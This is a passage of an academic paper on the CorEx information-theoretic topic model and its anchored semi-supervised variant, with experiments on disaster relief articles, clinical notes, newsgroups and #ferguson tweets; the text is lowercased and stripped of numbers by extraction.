disambiguate aspects of a complex social issue. our contributions are as follows: first, we frame corex as a topic model and derive an efficient alter- ation to the corex algorithm to exploit sparse data, such as word counts in documents, for dramatic speedups. second, we show how domain knowledge can be naturally integrated into corex through “an- chor words” and the information bottleneck. third, we demonstrate that corex and anchored corex produce topics of comparable quality to unsuper- vised and semi-supervised variants of lda over sev- eral datasets and metrics. finally, we carefully detail several anchoring strategies that highlight the versa- tility of anchored corex on a variety of tasks. methods . corex: correlation explanation here we review the fundamentals of correlation ex- planation (corex), and adopt the notation used by ver steeg and galstyan in their original presenta- tion of the model ( ). let x be a discrete ran- dom variable that takes on a finite number of val- ues, indicated with lowercase, x. furthermore, if we have n such random variables, let xg denote a sub-collection of them, where g ⊆ { , . . . ,n}. the probability of observing xg = xg is written as p(xg = xg), which is typically abbreviated to p(xg). the entropy of x is written as h(x) and the mutual information of two random variables x and x is given by i(x : x ) = h(x ) + h(x ) − h(x ,x ). the total correlation, or multivariate mutual in- formation, of a group of random variables xg is ex- pressed as tc(xg) = ∑ i∈g h(xi) −h(xg) ( ) = dkl ( p(xg)|| ∏ i∈g p(xi) ) . ( ) we see that eq. does not quantify “correlation” in the modern sense of the word, and so it can be help- ful to conceptualize total correlation as a measure of total dependence. indeed, eq. shows that total cor- relation can be expressed using the kullback-leibler divergence and, therefore, it is zero if and only if the joint distribution of xg factorizes, or, in other words, there is no dependence between the random variables. the total correlation can be written when condi- tioning on another random variable y , tc(xg | y ) = ∑ i∈g h(xi | y ) −h(xg | y ). so, we can consider the reduction in the total correlation when conditioning on y . tc(xg; y ) = tc(xg) −tc(xg | y ) ( ) = ∑ i∈g i(xi : y ) − i(xg : y ) ( ) the quantity expressed in eq. acts as a lower bound of tc(xg) (ver steeg and galstyan, ), as readily verified by noting that tc(xg) and tc(xg|y ) are always non-negative. also note, the joint distribution of xg factorizes conditional on y if and only if tc(xg | y ) = . if this is the case, then tc(xg; y ) is maximized, and y explains all of the dependencies in xg. in the context of topic modeling, xg represents a group of word types and y represents a topic to be learned. since we are always interested in group- ing multiple sets of words into multiple topics, we will denote the binary latent topics as y , . . .ym and their corresponding groups of word types as xgj for j = , . . . ,m respectively. the corex topic model seeks to maximally explain the dependencies of words in documents through latent topics by max- imizing tc(x; y , . . . ,ym). to do this, we maxi- mize the following lower bound on this expression: max gj,p(yj|xgj ) m∑ j= tc(xgj ; yj). ( ) as we describe in the following section, this ob- jective can be efficiently approximated, despite the search occurring over an exponentially large proba- bility space (ver steeg and galstyan, ). since each topic explains a certain portion of the overall total correlation, we may choose the number of topics by observing diminishing returns to the ob- jective. furthermore, since the corex implementa- tion depends on a random initialization (as described shortly), one may restart the corex topic model sev- eral times and choose the one that explains the most total correlation. the latent factors, yj, are optimized to be infor- mative about dependencies in the data and do not require generative modeling assumptions. note that the discovered factors, y , can be used as inputs to construct new latent factors, z, and so on leading to a hierarchy of topics. although this extension is quite natural, we focus our analysis on the first level of topic representations for easier interpretation and evaluation. . corex implementation we summarize the implementation of corex as pre- sented by ver steeg and galstyan ( ) in prepa- ration for innovations introduced in the subsequent sections. the numerical optimization for corex be- gins with a random initialization of parameters and then proceeds via an iterative update scheme simi- lar to em. for computational tractability, we subject the optimization in eq. to the constraint that the groups, gj, do not overlap, i.e. we enforce single- membership of words within topics. the optimiza- tion entails a combinatorial search over groups, so instead we look for a form that is more amenable to smooth optimization. we rewrite the objective using the alternate form in eq. while introducing indica- tor variables αi,j which are equal to if and only if word xi appears in topic yj (i.e. i ∈ gj). max αi,j,p(yj|x) m∑ j= ( n∑ i= αi,ji(xi : yj) − i(x : yj) ) s.t. αi,j = i[j = arg max j̄ i(xi : yj̄)]. ( ) note that the constraint on non-overlapping groups now becomes a constraint on α. to make the opti- mization smooth we should relax the constraint so that αi,j ∈ [ , ]. to do so, we replace the second line with a softmax function. the update for α at iteration t becomes, αti,j = exp ( λt(i(xi : yj) − max j̄ i(xi : yj̄)) ) . now α ∈ [ , ] and the parameter λ controls the sharpness of the softmax function. early in the opti- mization we use a small value of λ, then increase it later in the optimization to enforce a hard constraint. the objective in eq. only lower bounds total cor- relation in the hard max limit. the constraint on α forces competition among latent factors to explain certain words, while setting λ = results in all fac- tors learning the same thing. holding α fixed, taking the derivative of the objective (with respect to the variables p(yj|x), and setting it equal to zero leads to a fixed point equation. we use this fixed point to define update equations at iteration t. pt(yj) = ∑ x̄ pt(yj|x̄)p(x̄) ( ) pt(xi|yj) = ∑ x̄ pt(yj|x̄)p(x̄)i[x̄i = xi]/pt(yj) log pt+ (yj|x`) = ( ) log pt(yj)+ n∑ i= αti,j log pt(x ` i | yj) p(x`i) − logzj(x`) the first two lines just define the marginals in terms of the optimization parameter, pt(yj|x). we take p(x) to be the empirical distribution defined by some observed samples, x`,` = , . . . ,n. the third line updates pt(yj|x`), the probabilistic labels for each latent factor, yj, for a given sample, x`. note that an easily calculated constant, zj(x`), appears to ensure the normalization of pt(yj|x`) for each sample. we iterate through these updates until convergence. after convergence, we use the mutual information terms i(xi : yj) to rank which words are most in- formative for each factor. the objective is a sum of terms for each latent factor and this allows us to rank the contribution of each factor toward our lower bound on the total correlation. the expected log of the normalization constant, often called the free en- ergy, e[logzj(x)], plays an important role since its expectation provides a free estimate of the i-th term in the objective (ver steeg and galstyan, ), as can be seen by taking the expectation of eq. at convergence and comparing it to eq. . because our sample estimate of the objective is just the mean of contributions from individual sample points, x`, we refer to logzj(x`) as the pointwise total correlation explained by factor j for sample `. pointwise tc can be used to localize which samples are particu- larly informative about specific latent factors. . sparsity optimization . . derivation to alter the corex optimization procedure to ex- ploit sparsity in the data, we now assume that all variables, xi,yj, are binary and x is a binary vector where x`i = if word i occurs in document ` and x`i = otherwise. since all variables are binary, the marginal distribution, p(xi|yj), is just a two by two table of probabilities and can be estimated effi- ciently. the time-consuming part of training is the subsequent update of the document labels in eq. for each document `. the computation of the log likelihood ratio for all n words over all documents is not efficient, as most words do not appear in a given document. we rewrite the logarithm in the interior of the sum. log pt(x ` i | yj) p(x`i) = log pt(xi = | yj) p(xi = ) + ( ) xli log ( pt(x ` i = | yj)p(xi = ) pt(xi = | yj)p(x`i = ) ) note, when the word does not appear in the docu- ment, only the leading term of eq. will be nonzero. however, when the word does appear, everything but log p(x`i = | yj)/p(x`i = ) cancels out. so, we have taken advantage of the fact that the corex topic model binarizes documents to assume by de- fault that a word does not appear in the document, and then correct the contribution to the update if the word does appear. thus, when substituting back into eq. , the sum becomes a matrix multiplication between a matrix with dimensions of the number of variables by the number of documents and entries x`i that is as- sumed to be sparse and a dense matrix with di- mensions of the number of variables by the num- ber of latent factors. given n variables, n sam- ples, and ρ nonzero entries in the data matrix, the d is a st e r r e li e f a rt ic le s t im e ( s e c o n d s) corex sparse corex lda n e w y o rk t im e s t im e ( s e c o n d s) number of docs ( words fixed) p u b m e d t im e ( s e c o n d s) number of words ( documents fixed) figure : speed comparisons to a fixed number of itera- tions as the number of documents and words vary. new york times articles and pubmed abstracts were collected from the uci machine learning repository (lichman, ). the disaster relief articles are described in section . , and represented simply as bags of words, not phrases. asymptotic scaling for corex goes from o(nn) to o(n)+o(n)+o(ρ) exploiting sparsity. latent tree modeling approaches are quadratic in n or worse, so we expect corex’s computational advantage to in- crease for larger datasets. . . optimization evaluation we perform experiments comparing the running time of corex before and after implementing the im- provements which exploit sparsity. we also compare with scikit-learn’s simple batch implementation of lda using the variational bayes algorithm (hoff- man et al., ). experiments were performed on a four core, intel i chip running at ghz with gb ram. we show run time when varying the data size in terms of the number of word types and the num- ber of documents. we used topics for all runs and set the number of iterations for each run to itera- tions for lda and iterations for corex. results are shown in figure . we see that corex exploit- ing sparsity is orders of magnitude faster than the naive version and is generally comparable to lda as the number of documents scales. the slope on the log-log plot suggests a linear dependence of run- ning time on the dataset size, as expected. . anchor words via the bottleneck the information bottleneck formulates a trade-off between compressing data x into a representation y , and preserving the information in x that is rel- evant to z (typically labels in a supervised learning task) (tishby et al., ; friedman et al., ). more formally, the information bottleneck is ex- pressed as max p(y|x) βi(z : y ) − i(x : y ), ( ) where β is a parameter controlling the trade-off be- tween compressing x and preserving information about the relevance variable, z. to see the connection with corex, we compare the corex objective as written in eq. with the bottleneck in eq. . we see that we have exactly the same compression term for each latent factor, i(x : yj), but the relevance variables now corre- spond to z ≡ xi. if we want to learn represen- tations that are more relevant to specific keywords, we can simply anchor a word type xi to topic yj, by constraining our optimization so that αi,j = βi,j, where βi,j ≥ controls the anchor strength. oth- erwise, the updates on α remain the same. this schema is a natural extension of the corex optimiza- tion and it is flexible, allowing for multiple word types to be anchored to one topic, for one word type to be anchored to multiple topics, or for any com- bination of these semi-supervised anchoring strate- gies. related work with respect to integrating domain knowledge into topic models, we draw inspiration from arora et al. ( ), who used anchor words in the con- text of non-negative matrix factorization. using an assumption of separability, these anchor words act as high precision markers of particular topics and, thus, help discern the topics from one another. al- though the original algorithm proposed by arora et al. ( ), and subsequent improvements to their approach, find these anchor words automatically (arora et al., ; lee and mimno, ), recent adaptations allow manual insertion of anchor words and other metadata (nguyen et al., ; nguyen et al., ). our work is similar to the latter, where we treat anchor words as fuzzy logic markers and em- bed them into the topic model in a semi-supervised fashion. in this sense, our work is closest to halpern et al. ( ; ), who have also made use of do- main expertise and semi-supervised anchored words in devising topic models. there is an adjacent line of work that has focused on incorporating word-level information into lda- based models. jagarlamudi et al. ( ) proposed seededlda, a model that seeds words into given topics and guides, but does not force, these topics towards these integrated words. andrzejewski and zhu ( ) presented a model that makes use of “z- labels,” words that are known to pertain to specific topics and that are restricted to appearing in some subset of all the possible topics. although the z- labels can be leveraged to place different senses of a word into different topics, it requires additional ef- fort to determine when these different senses occur. our anchoring approach allows a user to more easily anchor one word to multiple topics, allowing corex to naturally find topics that revolve around different senses of a word. andrzejewski et al. ( ) presented a second model which allows specification of must-link and cannot-link relationships between words that help partition otherwise muddled topics. these logical constraints help enforce topic separability, though these mechanisms less directly address how to an- chor a single word or set of words to help a topic emerge. more generally, the must/cannot link and z-label topic models have been expressed in a powerful first-order-logic framework that allows the specification of arbitrary domain knowledge through logical rules (andrzejewski et al., ). others have built off this first-order-logic approach to au- tomatically learn rule weights (mei et al., ) and incorporate additional latent variable informa- tion (foulds et al., ). mathematically, corex topic models most closely resemble topic models based on latent tree recon- struction (chen et al., ). in chen et al.’s ( ) analysis, their own latent tree approach and corex both report significantly better perplexity than hi- erarchical topic models based on the hierarchical dirichlet process and the chinese restaurant process. corex has also been investigated as a way to find “surprising” documents (hodas et al., ). data and evaluation methods . data we use two challenging datasets with corresponding domain knowledge lexicons to evaluate anchored corex. our first dataset consists of , human- itarian assistance and disaster relief (ha/dr) arti- cles covering disaster types collected from re- liefweb, an ha/dr news article aggregator spon- sored by the united nations. to mitigate over- whelming label imbalances during anchoring, we both restrict ourselves to documents in english with one label, and randomly subsample , articles from each of the largest disaster type labels. this leaves us with a corpus of , articles. we accompany these articles with an ha/dr lex- icon of approximately , words and phrases. the lexicon was curated by first gathering – seed terms per disaster type from ha/dr domain experts and crisislex. this term list was then ex- panded by creating word embeddings for each dis- aster type, and taking terms within a specified co- sine similarity of the seed words. these lists were then filtered by removing names, places, non-ascii characters, and terms with fewer than three charac- ters. finally, the extracted terms were audited using crowdflower, where users rated the relevance of the terms on a likert scale. low relevance terms were dropped from the lexicon. of these terms , types appear in the ha/dr articles. our second dataset consists of , deidentified clinical discharge summaries from the informatics for integrating biology and the bedside (i b ) obesity challenge. these summaries are labeled by clinical experts with conditions frequently associated with obesity. for these documents, we leverage a text pipeline that extracts common med- ical terms and phrases (dai et al., ; chapman et al., ), which yields , such term types. ha/dr articles and accompanying lexicon available at http://dx.doi.org/ . /dvn/tgopru data available upon data use agreement at https:// www.i b .org/nlp/obesity/ for both sets of documents, we use their respective lexicons to break the documents down into bags of words and phrases. we also make use of the newsgroups dataset, as provided and preprocessed in the scikit-learn li- brary (pedregosa et al., ). . evaluation corex does not explicitly attempt to learn a genera- tive model and, thus, traditional measures such as perplexity are not appropriate for model compari- son against lda. furthermore, it is well-known that perplexity and held-out log-likelihood do not neces- sarily correlate with human evaluation of semantic topic quality (chang et al., ). therefore, we measure the semantic topic quality using mimno et al.’s ( ) umass automatic topic coherence score, which correlates with human judgments. we also evaluate the models in terms of multi- class logistic regression document classification (pe- dregosa et al., ), where the feature set of each document is its topic distribution. we perform all document classification tasks using a / training- test split. finally, we measure how well each topic model does at clustering documents. we obtain a cluster- ing by assigning each document to the topic that oc- curs with the highest probability. we then measure the quality within clusters (homogeneity) and across clusters (adjusted mutual information). the highest possible value for both measures is one. we do not report clustering metrics on the clinical health notes because the documents are multi-label and, in that case, the metrics are not well-defined. . choosing anchor words we wish to systematically test the effect of anchor words given the domain-specific lexicons. to do so, we follow the approach used by jagarlamudi et al. ( ) to automatically generate anchor words: for each label in a data set, we find the words that have the highest mutual information with the label. for word w and label l, this is computed as i(l : w) = h(l) −h(l | w), ( ) where for each document of label l we consider if the word w appears or not. . . . . m a c ro f disaster relief articles newsgroups clinical health notes . . . . . m ic ro f c o h e re n c e number of topics number of topics . . . . h o m o g e n e it y number of topics corex lda figure : baseline comparison of corex to lda with respect to topic coherence and document classification and clustering on three different datasets as the number of topics vary. points are the average of runs of a topic model. confidence intervals are plotted but are so small that they are not distinguishable. corex is trained using binary data, while lda is trained on count data. ho- mogeneity is not well-defined on the multi-label clinical health notes, so it is omitted. results . lda baseline comparison we compare corex to lda in terms of topic coher- ence, document classification, and document clus- tering across three datasets. corex is trained on bi- nary data, while lda is trained on count data. while not reported here, corex consistently outperformed lda trained on binary data. in doing these compar- isons, we use the gensim implementation of lda (řehůřek and sojka, ). the results of compar- ing corex to lda as a function of the number of topics are presented in figure . across all three datasets, we find that the topics produced by corex yield document classification re- sults that are on par with or better than those pro- duced by lda topics. in terms of clustering, corex consistently produces document clusters of higher rank disaster relief topic drought, farmers, harvest, crop, livestock, planting, grain, maize, rainfall, irrigation eruption, volcanic, lava, crater, eruptions, volcanos, slopes, volcanic activity, evacuated, lava flows winter, snow, snowfall, temperatures, heavy snow, heating, freezing, warm clothing, severe winter, avalanches military, armed, civilians, soldiers, aircraft, weapons, rebel, planes, bombs, military personnel rank newsgroups topic team, game, season, player, league, hockey, play, teams, nhl car, bike, cars, engine, miles, road, ride, riding, bikes, ground nasa, launch, orbit, shuttle, mission, satellite, gov, jpl, orbital, solar medical, disease, doctor, patients, treatment, medicine, health, hospital, doctors, pain rank clinical health notes topic vomiting, nausea, abdominal pain, diarrhea, fever, dehydration, chill, clostridium difficile, intravenous fluid, compazine anxiety state, insomnia, ativan, neurontin, depression, lorazepam, gabapentin, trazodone, fluoxetine, headache pain, oxycodone, tylenol, percocet, ibuprofen, morphine, osteoarthritis, hernia, motrin, bleeding table : examples of topics learned by the corex topic model. words are ranked according to mutual informa- tion with the topic, and topics are ranked according to the amount of total correlation they explain. topic models were run with topics on the reliefweb and news- groups datasets, and topics on the clinical health notes. homogeneity than lda. on the disaster relief arti- cles, the corex clusters are nearly twice as homoge- neous as the lda clusters. corex outperforms lda in terms of topic coher- ence on two out of three of the datasets. while lda . . . . . . h o m o g e n e it y unsupervised semi-supervised disaster relief articles ( topics) unsupervised semi-supervised newsgroups ( topics) . . . . . . a d ju st e d m u tu a l in fo rm a ti o n co rex ld a an ch ore d c ore x lin ke d l da z-l ab els ld a c o h e re n c e co rex ld a an ch ore d c ore x lin ke d l da z-l ab els ld a figure : comparison of anchored corex to other semi- supervised topic models in terms of document clustering and topic coherence. for each dataset, the number of top- ics is fixed to the number of document labels. each dot is the average of runs. confidence intervals are plotted but are so small that they are not distinguishable. produces more coherent topics for the clinical health notes, it is particularly striking that corex is able to produce high quality topics while only leverag- ing binary count data. examples of these topics are shown in table . despite the binary counts limi- tation, corex still finds meaningfully coherent and competitive structure in the data. . anchored corex analysis we now examine the effects and benefits of guiding corex through anchor words. in doing so, we also compare anchored corex to other semi-supervised topic models. . . anchoring for topic separability we are first interested in how anchoring can be used to encourage topic separability so that docu- ments cluster well. we focus on the ha/dr articles and newsgroups datasets, since traditional clus- tering metrics are not well-defined on the multi-label clinical health notes. for both datasets, we fix the rank anchored disaster relief topic harvest, locus, drought, food crisis, farmers, crops, crop, malnutrition, food aid, livestock tents, quake, international federation, red crescent, red cross, blankets, earthquake, richter scale, societies, aftershocks climate, impacts, warming, climate change, irrigation, consumption, household, droughts, livelihoods, interventions storms, weather, winds, coastal, tornado, meteorological, tornadoes, strong winds, tropical, roofs rank anchored newsgroups topic government, congress, clinton, state, national, economic, general, states, united, order bible, christian, god, jesus, christians, believe, life, faith, world, man use, used, high, circuit, power, work, voltage, need, low, end baseball, pitching, braves, mets, hitter, pitcher, cubs, dl, sox, jays table : examples of topics learned by corex when simultaneously anchoring many topics with anchoring parameter β = . anchor words are shown in bold. words are ranked according to mutual information with the topic, and topics are ranked according to the amount of total correlation they explain. topic models were run with topics on the reliefweb articles and topics on the newsgroups dataset. number of topics to be equal to the number of doc- ument labels. it is in this context that we compare anchored corex to two other semi-supervised topic models: z-labels lda and must/cannot link lda. using the method described in section . , we au- tomatically retrieve the top five anchors for each dis- aster type and newsgroup. we then filter these lists of any words that are ambiguous, i.e. words that are anchor words for more than one document label. for anchored corex and z-labels lda we simulta- neously assign each set of anchor words to exactly one topic each. for must/cannot link lda, we cre- ate must-links within the words of the same anchor group, and create cannot-links between words of dif- ferent anchor groups. since we are simultaneously anchoring to many topics, we use a weak anchoring parameter β = for anchored corex. using the notation from their original papers, we use η = for z-labels lda, and η = for must/cannot link lda. for both lda variants, we use α = . , β = . and take , samples, and estimate the models using code implemented by the original authors. the results of this comparison are shown in fig- ure , and examples of anchored corex topics are shown in table . across all measures corex and anchored corex outperform lda. we find that an- chored corex always improves cluster quality ver- sus corex in terms of homogeneity and adjusted mutual information. compared to corex, multiple simultaneous anchoring neither harms nor benefits the topic coherence of anchored corex. together these metrics suggest that anchored corex is find- ing topics that are of equivalent coherence to corex, but more relevant to the document labels since gains are seen in terms of document clustering. against the other semi-supervised topic models, anchored corex compares favorably. the document clustering of anchored corex is similar to, or bet- ter than, that of z-labels lda and must/cannot link lda. across the disaster relief articles, anchored corex finds less coherent topics than the two lda variants, while it finds similarly coherent topics as must/cannot link lda on the newsgroup dataset. . . anchoring for topic representation we now turn to studying how domain knowledge can be anchored to a single topic to help an other- wise dominated topic emerge, and how the anchor- ing parameter β affects that emergence. to discern this effect, we focus just on anchored corex along with the ha/dr articles and clinical health notes, datasets for which we have a domain expert lexicon. we devise the following experiment: first, we de- termine the top five anchor words for each docu- ment label using the methodology described in sec- tion . . unlike in the previous section, we do not filter these lists of ambiguous anchor words. sec- ond, for each document label, we run an anchored corex topic model with that label’s anchor words anchored to exactly one topic. we compare this an- . . . . . . t o p ic o v e rl a p d if f. p o st -a n c h o ri n g disaster relief articles . . . . . clinical health notes p e rc e n t c h a n g e i n t o p ic c o h e re n c e anchoring parameter β . . . . . . . f d if fe re n c e p o st -a n c h o ri n g anchoring parameter β . . . . . . . figure : effect of anchoring words to a single topic for one document label at a time as a function of the anchor- ing parameter β. light gray lines indicate the trajectory of the metric for a given disaster or disease label. thick red lines indicate the pointwise average across all labels for fixed value of β. chored topic model to an unsupervised corex topic model using the same random seeds, thus creating a matched pair where the only difference is the treat- ment of anchor words. finally, this matched pairs process is repeated times, yielding a distribution for each metric over each label. we use topics when modeling the reliefweb articles and topics when modeling the i b clin- ical health notes. these values were chosen by ob- serving diminishing returns to the total correlation explained by additional topics. in figure we show how the results of this ex- periment vary as a function of the anchoring pa- rameter β for each disaster and disease type in the two data sets. since there is heavy variance across document labels for each metric, we also examine a more detailed cross section of these results in fig- ure , where we set β = for the clinical health notes and set β = for the disaster relief arti- cles. as we show momentarily, disaster and disease types that benefit the most from anchoring were un- . . . . . . . . tropical cyclone flood epidemic earthquake drought volcano flash flood insect infestation cold wave technological disaster tsunami land slide wild fire severe local storm other snow avalanche extratropical cyclone mud slide heat wave storm surge fire anchoring parameter β = anchoring parameter β = . . . . . . . anchoring parameter β = . . . . . . . . topic overlap diff. post-anchoring asthma coronary heart disease congestive heart failure depression diabetes gerd gallstones gout hypercholesterolemia hypertension hypertriglyceridemia osteoarthritis obstructive sleep apnea obesity peripheral vascular disease anchoring parameter β = percent change of anchored topic coherence when most predictive topic anchoring parameter β = . . . . . . f difference post-anchoring anchoring parameter β = . . . p ro p o rtio n o f r u n s a n c h o re d t o p ic is th e m o st p re d ic tiv e . . . a v e ra g e f s c o re p re -a n c h o rin g . . . a v e ra g e t o p ic o v e rla p p re -a n c h o rin g . . . p ro p o rtio n o f r u n s a n c h o re d t o p ic is th e m o st p re d ic tiv e . . . a v e ra g e f s c o re p re -a n c h o rin g . . . a v e ra g e t o p ic o v e rla p p re -a n c h o rin g figure : cross-section results of the anchoring metrics from fixing β = for the clinical health notes, and β = for the disaster relief articles. disaster and disease types are sorted by frequency, with the most frequent document labels appearing at the top. error bars indicate % confidence intervals. the color bars provide context for each metric: topic overlap pre-anchoring, proportion of topic model runs where the anchored topic was the most predictive topic, and f score pre-anchoring. derrepresented pre-anchoring. document labels that were well-represented prior to anchoring achieve only marginal gain. this results in the variance seen in figure . a priori we do not know that anchoring will cause the anchor words to appear at the top of topics. so, we first measure how the topic overlap, the propor- tion of the top ten mutual information words that ap- pear within the top ten words of the topics, changes before and after anchoring. from figure (row ) we see that as β increases, more of these rel- evant words consistently appear within the topics. for the disaster relief articles, many disaster types see about two more words introduced, while in the clinical health notes the overlap increases by up to four words. analyzing the cross section in fig- ure (column ), we see many of these gains come from disaster and disease types that appeared less in the topics pre-anchoring. thus, we can sway the topic model towards less dominant themes through anchoring. document labels that occur the most frequently are those for which the topic overlap changes the least. next, we examine whether these anchored topics are more coherent topics. to do so, we compare the coherence of the anchored topic with that of the most predictive topic pre-anchoring, i.e. the topic with the largest corresponding coefficient in magnitude of the logistic regression, when the anchored topic itself is most predictive. from figure (row ), we see these results have more variance, but largely the anchored topics are more coherent. in some cases, the coher- ence is . to times that of pre-anchoring. fur- thermore, by colors of the central panel of figure , we find that the anchored topics are, indeed, often the most predictive topics for each document label. similar to topic overlap, the labels that see the least improvement are those that appear the most and are already well-represented in the topic model. finally, we find that the anchored, more coherent topics can lead to modest gains in document clas- sification. for the disaster relief articles, figure (row ) shows that there are mixed results in terms of f score improvement, with some disaster types performing consistently better, and others perform- ing consistently worse. the results are more consis- tent for the clinical health notes, where there is an average increase of about . in the f score, and some disease types see an increase of up to . in f . given that we are only anchoring words to the topic model, these are significant gains in predictive power. unlike the gains in topic overlap and coherence, the f score increases do not simply correlate with which document labels appeared most frequently. for example, we see in figure (column ) that tropical cyclone exhibits the largest increase in pre- dictive performance, even though it is also one of the most frequently appearing document labels. simi- larly, some of the major gains in f for the disease types, and major losses in f for the disaster types, do not come from the most or least frequent docu- ment labels. thus, if using anchoring single topics within corex for document classification, it is im- portant to examine how the anchoring affects pre- diction for individual document labels. . . anchoring for topic aspects finding topics that revolve around a word, such as a name or location, or a group of words can aid in understanding how a particular subject or event has been framed. we finish with a qualitative ex- periment where we disambiguate aspects of a topic by anchoring a set of words to multiple topics within the corex topic model. note, must/cannot link lda cannot be used in this manner, and z-labels lda would require us to know these aspects beforehand. we consider tweets containing #ferguson (case- insensitive), which detail reactions to the shooting of black teenager michael brown by white po- lice officer darren wilson on august th, in ferguson, missouri. these tweets were collected from the twitter gardenhose, a % random sam- ple of all tweets, over the period august th, to november th, . since corex will seek max- imally informative topics by exploiting redundan- cies, we remove duplicates of retweets, leaving us with , tweets. we filter these tweets of punc- tuation, stop words, hyperlinks, usernames, and the ‘rt’ retweet symbol, and use the top , word types. in the wake of both the shooting and the eventual non-indictment of darren wilson, several protests occurred. some onlookers supported and encour- aged such protests, while others characterized the protests as violent “riots.” to disambiguate these topic aspects of “protest” protest, protests, peaceful, violent, continue, night, island, photos, staten, nights protest, protests, #hiphopmoves, #cole, hiphop, nationwide, moves, fo, anheuser, boeing protest, protests, st, louis, guard, national, county, patrol, highway, city protest, protests, paddy, covering, beverly, walmart, wagon, hills, passionately, including protest, protests, solidarity, march, square, rally, #oakland, downtown, nyc, #nyc topic aspects of “riot” riot, riots, unheard, language, inciting, accidentally, jokingly, watts, waving, dies riot, black, riots, white, #tcot, blacks, men, whites, race, #pjnet riot, riots, looks, like, sounds, acting, act, animals, looked, treated riot, riots, store, looting, businesses, burning, fire, looted, stores, business gas, riot, tear, riots, gear, rubber, bullets, military, molotov, armored table : topic aspects around “protest” and “riot” from running a corex topic model with topics and anchor- ing “protest” and “protests” together to five topics and “riot” and “riots” together to five topics with β = . an- chor words are shown in bold. note, topics are not or- dered by total correlation. different depictions, we train a corex topic model with topics, anchoring “protest” and “protests” together to five topics, and “riot” and “riots” to- gether to five topics with β = . these anchored topics are presented in table . the anchored topics reflect different aspects of the framing of the “protests” and “riots,” and are generally interpretable, despite the typical difficulty of extracting coherent topics from short documents using lda (tang et al., ). the “protest” topic aspects describe protests in st. louis, oakland, bev- erly hills, and parts of new york city (topics , , , ), resistance by law enforcement (topics and ), and discussion of whether the protests were peaceful (topic ). topic revolves around hip-hop artists who marched in solidarity with protesters. the “riot” topic aspects discuss racial dynamics of the protests (topic ) and suggest the demonstrations are dangerous (topics and ). topic describes the “riot” gear used in the militarized response to the ferguson protesters, and topic also hints at aspects of conservatism through the hashtags #tcot (top conservatives on twitter) and #pjnet (patriot journalist network). as we see, anchored corex finds several in- teresting, non-trivial aspects around “protest” and “riot” that could spark additional qualitative inves- tigation. retrieving topic aspects through anchor words in this manner allows the user to explore dif- ferent frames of complex issues, events, or discus- sions within documents. as with the other anchor- ing strategies, this has the potential to supplement qualitative research done by researchers within the social sciences and digital humanities. discussion we have introduced an information-theoretic topic model, corex, that does not rely on any of the gener- ative assumptions of lda-based topic models. this topic model seeks maximally informative topics as encoded by their total correlation. we also derived a flexible method for anchoring word-level domain knowledge in the corex topic model through the in- formation bottleneck. anchored corex guides the topic model towards themes that do not naturally emerge, and often produces more coherent and pre- dictive topics. both corex and anchored corex consistently produce topics that are of comparable quality to lda-based methods, despite only making use of binarized word counts. anchored corex is more flexible than previous attempts at integrating word-level information into topic models. topic separability can be enforced by lightly anchoring disjoint groups of words to sepa- rate topics, topic representation can be promoted by assertively anchoring a group of words to a single topic, and topic aspects can be unveiled by anchor- ing a single group of words to multiple topics. the flexibility of anchoring through the information bot- tleneck lends itself to many other possible creative anchoring strategies that could guide the topic model in different ways. different goals may call for dif- ferent anchoring strategies, and domain experts can shape these strategies to their needs. while we have demonstrated several advantages of the corex topic model to lda, it does have some technical shortcomings. most notably, corex re- lies on binary count data in its sparsity optimiza- tion, rather than the standard count data that is used as input into lda and other topic models. while we have demonstrated corex performs at the level of lda despite this limitation, its effect would be more noticeable on longer documents. this can be partly overcome if one chunks such longer docu- ments into shorter subdocuments prior to running the topic model. our implementation also requires that each word appears in only one topic. these lim- itations are not fundamental limitations of the the- ory, but a matter of computational efficiency. in future work, we hope to remove these restrictions while preserving the speed of the sparse corex topic modeling algorithm. as we have demonstrated, the information- theoretic approach provided via corex has rich po- tential for finding meaningful structure in docu- ments, particularly in a way that can help domain experts guide topic models with minimal interven- tion to capture otherwise eclipsed themes. the lightweight and versatile framework of anchored corex leaves open possibilities for theoretical ex- tensions and novel applications within the realm of topic modeling. acknowledgments we would like to thank the machine intelligence and data science (minds) research group at the infor- mation sciences institute for their help and insight during the course of this research. we also thank the vermont advanced computing core (vacc) for its computational resources. finally, we thank the anonymous reviewers and the tacl action editors diane mccarthy and kristina toutanova for their time and effort in helping us improve our work. ryan j. gallagher was a visiting research assistant at the information sciences institute while perform- ing this research. ryan j. gallagher and greg ver steeg were supported by darpa award hr - -c- and david kale was supported by the alfred e. mann innovation in engineering doctoral fellowship. references david andrzejewski and xiaojin zhu. . latent dirichlet allocation with topic-in-set knowledge. in proceedings of the naacl hlt workshop on semi-supervised learning for natural language pro- cessing, pages – . association for computational linguistics. david andrzejewski, xiaojin zhu, and mark craven. . incorporating domain knowledge into topic modeling via dirichlet forest priors. in proceedings of the th annual international conference on machine learning, pages – . david andrzejewski, xiaojin zhu, mark craven, and benjamin recht. . a framework for incorpo- rating general domain knowledge into latent dirichlet allocation using first-order logic. in proceedings of the international joint conference on artificial intelli- gence, volume , page . sanjeev arora, rong ge, and ankur moitra. . learning topic models–going beyond svd. in ieee rd annual symposium on foundations of computer science (focs), pages – . ieee. sanjeev arora, rong ge, yonatan halpern, david m. mimno, ankur moitra, david sontag, yichen wu, and michael zhu. . a practical algorithm for topic modeling with provable guarantees. in proceedings of international conference on machine learning, pages – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of ma- chine learning research, (jan): – . wray buntine and aleks jakulin. . discrete compo- nent analysis. in subspace, latent structure and fea- ture selection, pages – . springer. jonathan chang, sean gerrish, chong wang, jordan l. boyd-graber, and david m. blei. . reading tea leaves: how humans interpret topic models. in advances in neural information processing systems, pages – . wendy w. chapman, will bridewell, paul hanbury, gre- gory f. cooper, and bruce g. buchanan. . a simple algorithm for identifying negated findings and diseases in discharge summaries. journal of biomedi- cal informatics, ( ): – . peixian chen, nevin l. zhang, leonard k. m. poon, and zhourong chen. . progressive em for latent tree models and hierarchical topic detection. in proceed- ings of the thirtieth aaai conference on artificial in- telligence, pages – . manhong dai, nigam h. shah, wei xuan, mark a. musen, stanley j. watson, brian d. athey, fan meng, et al. . an efficient solution for mapping free text to ontology terms. amia summit on translational bioinformatics, . chris ding, tao li, and wei peng. . on the equiv- alence between non-negative matrix factorization and probabilistic latent semantic indexing. computational statistics & data analysis, ( ): – . james foulds, shachi kumar, and lise getoor. . latent topic networks: a versatile probabilistic pro- gramming framework for topic models. in pro- ceedings of the international conference on machine learning, pages – . nir friedman, ori 